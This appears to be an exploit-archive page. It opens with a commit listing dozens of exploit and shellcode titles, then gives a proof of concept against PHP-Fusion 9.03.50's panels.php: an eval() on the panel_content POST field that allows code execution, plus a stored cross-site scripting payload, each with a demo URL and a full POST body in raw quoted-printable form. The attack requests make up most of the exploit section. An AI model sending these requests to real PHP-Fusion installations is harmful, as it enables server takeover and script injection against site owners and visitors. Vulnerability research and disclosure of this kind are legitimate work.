1979df6cb3
51 changes to exploits/shellcodes Tor Browser < 0.3.2.10 - Use After Free (PoC) Notepad++ < 7.7 (x64) - Denial of Service SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service InputMapper 1.6.10 - Denial of Service SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH) XnConvert 1.82 - Denial of Service (PoC) SpotFTP FTP Password Recovery 3.0.0.0 - 'Key' Denial of Service (PoC) SpotDialup 1.6.7 - 'Key' Denial of Service (PoC) Remote Desktop Gateway - 'BlueGate' Denial of Service (PoC) FreeBSD 12.0 - 'fd' Local Privilege Escalation iOS < 12.4.1 - 'Jailbreak' Local Privilege Escalation Easy File Sharing Web Server 7.2 - 'New User' Local Overflow (SEH) DeviceViewer 3.12.0.1 - Arbitrary Password Change Winrar 5.80 - XML External Entity Injection Microsoft Windows Media Center WMV / WMA 6.3.9600.16384 - Code Execution Siemens TIA Portal - Remote Command Execution Android 7 < 9 - Remote Code Execution CoreFTP 2.0 Build 674 SIZE - Directory Traversal (Metasploit) CoreFTP 2.0 Build 674 MDTM - Directory Traversal (Metasploit) CTROMS Terminal OS Port Portal - 'Password Reset' Authentication Bypass (Metasploit) MyBB < 1.8.21 - Remote Code Execution Nagios XI 5.6.5 - Remote Code Execution / Root Privilege Escalation Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit) Wolters Kluwer TeamMate 3.1 - Cross-Site Request Forgery Publisure Hybrid - Multiple Vulnerabilities NetGain EM Plus 10.1.68 - Remote Command Execution Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection WordPress Plugin ARforms 3.7.1 - Arbitrary File Deletion DotNetNuke 9.3.2 - Cross-Site Scripting VehicleWorkshop 1.0 - 'bookingid' SQL Injection WordPress Plugin Tutor.1.5.3 - Local File Inclusion WordPress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting WordPress Plugin Wordfence.7.4.5 - Local File Disclosure WordPress Plugin contact-form-7 5.1.6 - Remote File Upload WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion WordPress Plugin WOOF Products Filter for WooCommerce 1.2.3 - Persistent Cross-Site Scripting WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting Joomla! 3.9.0 < 3.9.7 - CSV Injection PlaySMS 1.4.3 - Template Injection / Remote Code Execution Wing FTP Server - Authenticated CSRF (Delete Admin) WordPress Plugin Custom Searchable Data System - Unauthenticated Data M]odification UADMIN Botnet 1.0 - 'link' SQL Injection Joomla! Component ACYMAILING 3.9.0 - Unauthenticated Arbitrary File Upload Wordpress Plugin PicUploader 1.0 - Remote File Upload PHP-Fusion 9.03.50 - 'panels.php' Remote Code Execution WordPress Plugin Helpful 2.4.11 - SQL Injection Prestashop 1.7.6.4 - Cross-Site Request Forgery WordPress Plugin Simple File List 5.4 - Remote Code Execution Library CMS Powerful Book Management System 2.2.0 - Session Fixation Joomla! J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated) Joomla! J2 Store 3.3.11 - 'filter_order_Dir' Authenticated SQL Injection Beauty Parlour Management System 1.0 - Authentication Bypass Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes) Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes) Windows/x64 - WinExec Add-Admin (ROOT/I@mR00T$) Dynamic Null-Free Shellcode (210 Bytes) Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes) Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)
60 lines
No EOL
2.2 KiB
Text
60 lines
No EOL
2.2 KiB
Text
# Exploit Title: PHP-Fusion 9.03.50 - 'panels.php' Multiple vulnerability
|
|
# Google Dork: N/A=20
|
|
# Date: 2020-04-01
|
|
# Exploit Author: Unkn0wn
|
|
# Vendor Homepage: https://www.php-fusion.co.uk
|
|
# Software Link: https://www.php-fusion.co.uk/php_fusion_9_downloads.php
|
|
# Version: 9.03.50
|
|
# Tested on: Ubuntu
|
|
# CVE : N/A
|
|
---------------------------------------------------------
|
|
Code Execution:
|
|
This vulnerabilty in "add_panel_form()" function.
|
|
in line 527 we can see "eval" tag:
|
|
*
|
|
eval("?>".stripslashes($_POST['panel_content'])."<?php ");
|
|
*
|
|
and to this funcation in line 528 - 530 return us payload:
|
|
*
|
|
$eval =3D ob_get_contents();
|
|
ob_end_clean();
|
|
echo $eval;
|
|
=09=09=09=09=09
|
|
*
|
|
Demo:
|
|
http://localhost/PHP-Fusion/files/administration/panels.php?aid=3Dae28e84e2=
|
|
2e900fb§ion=3Dpanelform&action=3Dedit&panel_id=3D4
|
|
|
|
POST DATA:
|
|
fusion_token=3D1-1585668386-30dc735031f57e89268287bb176e78b092e156dd32a583c=
|
|
f191c7dd30c2d99e9&form_id=3Dpanel_form&fusion_PmbaJ2=3D&panel_id=3D4&panel_=
|
|
name=3DWelcome Message&panel_filename=3Dnone&panel_side=3D2&panel_restricti=
|
|
on=3D2&panel_url_list=3D&panel_display=3D0&panel_content-insertimage=3D&pan=
|
|
el_content=3D;"Code Execution Payload"&panel_access=3D0&panel_languages[]=
|
|
=3DEnglish&panel_save=3DPreview Panel
|
|
----------------------------
|
|
|
|
Cross site-scripting:
|
|
In line 532 with POST DATA prin"t panel_content:
|
|
"
|
|
echo "<p>".nl2br(parse_textarea($_POST['panel_content'], FALSE, FALSE))."</=
|
|
p>\n";
|
|
"
|
|
|
|
Demo:
|
|
http://localhost/PHP-Fusion/files/administration/panels.php?aid=3Dae28e84e2=
|
|
2e900fb§ion=3Dpanelform&action=3Dedit&panel_id=3D4
|
|
|
|
POST DATA:
|
|
fusion_token=3D1-1585668386-30dc735031f57e89268287bb176e78b092e156dd32a583c=
|
|
f191c7dd30c2d99e9&form_id=3Dpanel_form&fusion_PmbaJ2=3D&panel_id=3D4&panel_=
|
|
name=3DWelcome Message&panel_filename=3Dnone&panel_side=3D2&panel_restricti=
|
|
on=3D2&panel_url_list=3D&panel_display=3D0&panel_content-insertimage=3D&pan=
|
|
el_content=3D;"<script>alert('Unkn0wn')</script>"&panel_access=3D0&panel_la=
|
|
nguages[]=3DEnglish&panel_save=3DPreview Panel
|
|
|
|
----------------------------------------------------------
|
|
# Contact : 0x9a@tuta.io
|
|
# Visit: https://t.me/l314XK205E
|
|
# @ 2010 - 2020
|
|
# Underground Researcher |